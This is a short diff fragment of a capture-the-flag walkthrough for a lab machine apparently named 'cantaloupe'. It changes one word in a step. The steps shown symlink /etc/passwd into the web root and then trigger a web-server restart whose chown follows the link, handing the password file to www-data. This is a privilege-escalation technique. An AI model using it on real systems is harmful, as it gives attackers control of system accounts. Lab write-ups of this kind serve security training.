bsamtleben/color-ctf-walkthroughs/machines/cantaloupe/walkthrough.md

    ln -s /etc/passwd /var/www/html/passwd
    ```

-2. Send the command to "restart the web server".
+2. Run the command to "restart the web server".
 This will call  the`chown` command from above, follow the symbolic link and change the owner of `/etc/passwd` to `www-data`.

    ```bash
    /opt/control-panel web-restart